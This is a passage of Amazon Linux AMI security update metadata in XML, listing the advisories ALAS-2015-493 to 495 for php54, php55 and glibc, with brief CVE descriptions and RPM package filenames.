release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.10" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.10-1.49.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92-plperl" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.10-1.49.amzn1.i686.rpm</filename></package><package 
name="postgresql92-plpython" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.10-1.49.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.10" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.10-1.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-493</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-493: critical priority package update for php54</title><issued date="2015-03-13 10:00:00" /><updated date="2015-03-13 10:03:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0273:
1194730:
CVE-2015-0273 php: use after free vulnerability in unserialize() with DateTimeZone
CVE-2015-0235:
A heap-based buffer overflow was found in glibc's __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application.
1183461:
CVE-2015-0235 glibc: __nss_hostname_digits_dots() heap-based buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0235" title="" id="CVE-2015-0235" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0273" title="" id="CVE-2015-0273" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-ldap" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.38" release="1.66.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php54-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.38" 
release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.38" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.38-1.66.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.38-1.66.amzn1.i686.rpm</filename></package><package 
name="php54-debuginfo" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.38" release="1.66.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-fpm-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.38" release="1.66.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-gd-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.38-1.66.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.38" release="1.66.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.38-1.66.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-494</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-494: critical priority package update for php55</title><issued date="2015-03-23 08:29:00" /><updated date="2015-03-23 08:54:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0273:
A use-after-free flaw was found in the unserialize() function of PHP's DateTimeZone implementation. A malicious script author could possibly use this flaw to disclose certain portions of server memory.
1194730:
CVE-2015-0273 php: use after free vulnerability in unserialize() with DateTimeZone
CVE-2015-0235:
A heap-based buffer overflow was found in glibc's __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application.
1183461:
CVE-2015-0235 glibc: __nss_hostname_digits_dots() heap-based buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0235" title="" id="CVE-2015-0235" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0273" title="" id="CVE-2015-0273" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-pspell" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.22" release="1.98.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-recode-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" 
version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.22" release="1.98.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.22-1.98.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.22" release="1.98.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-process-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.22" release="1.98.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-xml-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.22" release="1.98.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.22-1.98.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.22" release="1.98.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.22-1.98.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-495</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-495: medium priority package update for glibc</title><issued date="2015-03-23 08:30:00" /><updated date="2015-03-23 08:55:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8121:
It was found that the files back end of Name Service Switch (NSS) did not isolate iteration over an entire database from key-based look-up API calls. An application performing look-ups on a database while iterating over it could enter an infinite loop, leading to a denial of service.
1165192:
CVE-2014-8121 glibc: Unexpected closing of nss_files databases after lookups causes denial of service
CVE-2014-6040:
An out-of-bounds read flaw was found in the way glibc's iconv() function converted certain encoded data to UTF-8. An attacker able to make an application call the iconv() function with a specially crafted argument could use this flaw to crash that application.
1135841:
CVE-2014-6040 glibc: crash in code page decoding functions (IBM933, IBM935, IBM937, IBM939, IBM1364)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6040" title="" id="CVE-2014-6040" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8121" title="" id="CVE-2014-8121" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-debuginfo" version="2.17" release="55.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-55.139.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-55.139.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-55.139.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="55.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-55.139.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="55.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-55.139.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="55.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-55.139.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="55.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-55.139.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-55.139.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.139.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-55.139.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="55.139.amzn1" epoch="0" 
